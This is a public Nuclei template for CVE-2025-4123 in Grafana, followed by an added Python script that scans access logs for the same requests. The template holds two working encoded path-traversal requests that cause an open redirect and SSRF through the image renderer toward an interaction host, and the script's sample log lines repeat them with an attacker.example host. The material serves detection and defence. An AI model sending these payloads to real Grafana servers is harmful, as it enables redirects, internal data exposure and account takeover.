PoC code [public]
id: CVE-2025-4123

info:
  name: Grafana - XSS / Open Redirect / SSRF via Client Path Traversal
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    An open redirect vulnerability in Grafana can be chained with other issues, such as XSS or SSRF, to increase impact. An attacker may exploit the redirect to target internal services or deliver malicious JavaScript, potentially leading to internal data exposure or account takeover.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L
    cvss-score: 7.6
    cve-id: CVE-2025-4123
    cwe-id: CWE-79,CWE-601
    epss-score: 0.05163
    epss-percentile: 0.895
  reference:
    - https://medium.com/@Nightbloodz/grafana-cve-2025-4123-full-read-ssrf-account-takeover-d12abd13cd53
    - https://grafana.com/blog/2025/05/21/grafana-security-release-high-severity-security-fix-for-cve-2025-4123/
  metadata:
    verified: true
    max-request: 1
    shodan-query: product:"Grafana"
    fofa-query: app="Grafana"
  tags: cve,cve2025,grafana,redirect,unauth,oss,vkev

http:
  - raw:
      - |
        GET /render/public/..%252f%255C{{interactsh-url}}%252f%253F%252f..%252f.. HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /public/..%2F%5coast.pro%2F%3f%2F..%2F.. HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        name: open-redirect
        dsl:
          - status_code == 302 && contains(location, '/\\oast.pro/?/../../')
      - type: dsl
        name: ssrf
        dsl:
          - contains(interactsh_protocol, 'dns') && contains(content_type, 'image/png')
# digest: 4a0a00473045022100e033c86126829576b7017256f67f61a245176c68a27d65852c325b6e1027c14d0220501a8d61a51c26639817cf1c1bb7fb2edc243534e8baaf86e3c9fb04b3f6d3e1:922c64590222798bb761d5b6d8e72950
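The two raw requests above rely on single- and double-percent-encoded `..` segments and a backslash (`%5c`) that, once decoded, turns the path into `/public/../\host/?/../..`, which a client treats as a redirect to another host. For a defender, the useful companion is a log check that decodes the same way and flags such requests against `/public/` and `/render/public/`. The following is an added example, not part of the Nuclei template or of Grafana's own code; the log lines are constructed, `oast.pro` is the interaction host used by the template, and `attacker.example` is a placeholder hostname.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). Line 2 mirrors the
# single-encoded open-redirect request from the template; line 3 mirrors the
# double-encoded /render/ SSRF request, with a placeholder hostname.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [01/Jun/2025:10:00:01 +0000] "GET /public/build/grafana.app.js HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jun/2025:10:00:02 +0000] "GET /public/..%2F%5coast.pro%2F%3f%2F..%2F.. HTTP/1.1" 302 0',
    '10.0.0.9 - - [01/Jun/2025:10:00:03 +0000] "GET /render/public/..%252f%255Cattacker.example%252f%253F%252f..%252f.. HTTP/1.1" 200 8813',
    '10.0.0.7 - - [01/Jun/2025:10:00:04 +0000] "GET /api/dashboards/home HTTP/1.1" 200 2048',
]

# Pulls method and request path out of a combined-log-format line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

# Only paths under Grafana's static asset route (and its image-renderer proxy) matter here.
TARGET_PREFIX_RE = re.compile(r"^/(?:render/)?public/")


def fully_decode(path, max_rounds=3):
    """Percent-decode until the string stops changing, so %252f -> %2f -> / is handled.

    Bounded by max_rounds so a pathological input cannot keep the loop busy.
    """
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify_request_path(path):
    """Return a finding label for a suspicious path, or None for benign traffic.

    Labels (hypothetical names chosen for this example):
      'ssrf-via-render'  - traversal under /render/public/ (renderer fetches the result)
      'open-redirect'    - traversal under /public/ with an empty segment that a
                           client would read as the start of an authority (//host)
      'path-traversal'   - a '..' segment under /public/ without the authority trick
    """
    normalized = fully_decode(path).replace("\\", "/")  # backslash is a separator to browsers
    if not TARGET_PREFIX_RE.match(normalized):
        return None
    segments = normalized.split("/")
    has_dotdot = ".." in segments
    if not has_dotdot:
        return None
    # An empty segment between two slashes (other than the leading one or a trailing
    # slash) is what turns '/../' + '/host' into a protocol-relative redirect.
    has_authority_like = "" in segments[1:-1]
    if normalized.startswith("/render/"):
        return "ssrf-via-render"
    if has_authority_like:
        return "open-redirect"
    return "path-traversal"


def scan_log_lines(lines):
    """Run the classifier over raw log lines; returns one finding dict per hit."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        label = classify_request_path(match.group("path"))
        if label is not None:
            findings.append({
                "client": line.split(" ", 1)[0],
                "path": match.group("path"),
                "label": label,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"{finding['label']:16} {finding['client']:10} {finding['path']}")
```

The decode-until-stable loop is the important design choice: a rule that only looks for the literal `..%2F` misses the double-encoded `/render/` variant the template sends first, while a rule that decodes exactly once misses it as well. Normalizing `\` to `/` before splitting is what makes the `%5c` trick visible as an empty segment.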